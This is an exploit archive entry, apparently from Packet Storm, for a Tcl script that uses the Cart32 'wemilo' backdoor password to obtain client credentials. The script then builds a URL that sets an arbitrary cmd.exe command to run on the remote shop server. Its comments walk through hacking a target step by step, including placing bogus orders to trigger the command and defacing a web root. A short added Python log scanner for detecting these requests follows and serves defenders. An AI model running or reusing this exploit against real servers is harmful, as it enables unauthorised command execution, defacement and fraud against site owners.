
wemilo.tcl

Date: 30 May 2000
Reported by: r00tabega
Type: packetstorm
Source: packetstormsecurity.com

Tcl exploit script for the Cart32 backdoor that allows command execution on remote servers.

Code
```tcl
#!/usr/bin/tcl
# [r00tabega.security.labs]
# www.r00tabega.com
# code by futant
# backdoor found by cerberus information security team
# http://www.cerberus-infosec.com {/advcart32.html}

# NOTE: This is terribly easy to exploit but it takes a few minutes
#
# Ok, here's how you do this.
# Go to www.myserver.com/scripts/cart32.exe
# If it says Cart32.exe 3.0, you are probably in luck
#
# Now, go to www.myserver.com/scripts/cart32.exe/cart32clientlist
# This is where the author put a backdoor in.
# type "wemilo" in the text field and hit the "Go" button
#
# Find the Client Code (username) that is for the site you are going
# to hack for example, www.myshophite.com's client code might be MSS
# or MYSHOP copy and paste the client code and client password into
# notepad/pico/whatever.
#
# Now run this script. It is a TCL script so therefore requires TCL.
# If you have a UNIX system, skip this part. If you are using windows
# get TCL from http://www.scriptics.com and run it like this:
# Start -> Run -> tclsh83 wemilo.tcl
#
#
# This script will ask you for the hostname you are hacking,
# the client code, and client password.
#
# Then it will ask you for the command you want to run on the remote
# server.
#
# (Hint: Sometimes IIS will give you the HTML root directory if you
# go to http://server.com/whatever.ida .idc, .ida or
# /cgi-bin/whatever.pl)
#
# Then this script will write data to an html file on your machine in
# the current directory called wemilo.html.
# Open this file in netscape or IE and click on the
# link. This will hopefully bring you to a Cart32 WWW page
# that will have tons of shit on it and a text box with your command
# in it. Scroll down to the bottom of the page and click "Save Cart32+ tab"
#
# Now the next order that comes through will run the command you selected.
# Go back to the main page of the site and add some shit to a shopping cart.
# If they accept check/money order fill in bogus crap and then confirm the order.
# your command will then be run.
#
# This DOES work unlike most supposed exploits.
#
#
# (IDK 2k)

package require http

puts "Cart32 exploit helper by futant"
puts "\nEnter the the hostname you wish to hack\nDo NOT include http://"
puts -nonewline "Host: "
flush stdout
set hostname [gets stdin]
puts "\nOk now, type in the Client code that you wish to use.\nYou can get a client code by going to:\nhttp://$hostname/scripts/cart32.exe/Cart32ClientList\nand typing wemilo for the password."
puts -nonewline "Client Code: "
flush stdout
set clientcode [gets stdin]

puts "\nEnter the clients password: (Also obtained from the URL above)"
puts -nonewline "Client Password: "
flush stdout
set clientpassword [gets stdin]

puts "\nNow type the command you want to run on the remote server: "
puts "(example: echo h4x0r3d by futant! > c:\\InetPub\\wwwroot\\index.html )"
puts -nonewline "cmd /c "
flush stdout
set command [gets stdin]

if {[catch {open wemilo.html w} fid]} {
    puts "ERROR: Couldnt open file for writing, copy and paste this URL.\n"
    set endstring [::http::formatQuery TabName "Cart32+" Action "Save Cart32+ Tab" SaveTab "Cart32+" Client "$clientcode" ClientPassword "$clientpassword" Admin "" AdminPassword "" TabToSave "Cart32+" PlusTabToSave "Run External Program" UseCMDLine "Yes" CMDLine "cmd.exe /c $command"]
    puts "\nYour custom exploit string is:"
    puts "http://$hostname/scripts/c32web.exe?$endstring"
    # Stop here: on failure $fid holds the error message, not a file handle.
    exit 1
}

set endstring [::http::formatQuery TabName "Cart32+" Action "Save Cart32+ Tab" SaveTab "Cart32+" Client "$clientcode" ClientPassword "$clientpassword" Admin "" AdminPassword "" TabToSave "Cart32+" PlusTabToSave "Run External Program" UseCMDLine "Yes" CMDLine "cmd.exe /c $command"]
puts "\nYour custom exploit string is:"
puts "http://$hostname/scripts/c32web.exe?$endstring"
puts $fid {<HTML>}
puts $fid "<A HREF=\"http://$hostname/scripts/c32web.exe?$endstring\">Click here to hack $hostname</A>"
puts $fid {</HTML>}
close $fid
puts "\nWrote to wemilo.html :]\nExiting..."

# k-rad.
```
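For defenders reviewing a Cart32 host, the two requests the script's comments describe leave distinct traces in the web server log. The following is an added example, not part of the original script: it scans IIS W3C-format lines for access to the client list path and for `c32web.exe` requests that set the "Run External Program" tab or a `CMDLine` value. The log layout, sample lines, and function names are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs

# Constructed IIS W3C log excerpt (documentation IPs, harmless command).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2000-05-30 10:01:02 192.0.2.10 GET /scripts/cart32.exe - 200
2000-05-30 10:01:40 192.0.2.10 POST /scripts/cart32.exe/Cart32ClientList - 200
2000-05-30 10:05:11 192.0.2.10 GET /scripts/c32web.exe TabName=Cart32%2b&PlusTabToSave=Run+External+Program&UseCMDLine=Yes&CMDLine=cmd.exe+%2fc+echo+test 200
2000-05-30 10:06:00 198.51.100.7 GET /scripts/c32web.exe TabName=Main 200
2000-05-30 10:07:00 198.51.100.7 GET /index.html - 200
"""

def parse_w3c(text):
    """Yield one dict per request, using the #Fields directive for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            parts = line.split()
            if fields and len(parts) == len(fields):
                yield dict(zip(fields, parts))

def classify(rec):
    """Return a finding tag for a request record, or None if unremarkable."""
    stem = rec["cs-uri-stem"].lower()  # IIS paths are case-insensitive
    query = rec.get("cs-uri-query", "-")
    params = {} if query == "-" else {
        k.lower(): v for k, v in parse_qs(query).items()}
    # Assumption: the form value may travel in a POST body that is not logged,
    # so any request for the client list path is flagged on the path alone.
    if stem.endswith("/cart32.exe/cart32clientlist"):
        return "clientlist-access"
    # The script's link carries the tab change in the query string.
    if stem.endswith("/c32web.exe") and (
            "cmdline" in params
            or params.get("plustabtosave") == ["Run External Program"]):
        return "external-program-tab-change"
    return None

def findings(text):
    """Return (date, time, client IP, tag) for every flagged request."""
    out = []
    for rec in parse_w3c(text):
        tag = classify(rec)
        if tag:
            out.append((rec["date"], rec["time"], rec["c-ip"], tag))
    return out

if __name__ == "__main__":
    for hit in findings(SAMPLE_LOG):
        print(*hit)
```
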

Vulners AI Score: 7.4 (High risk)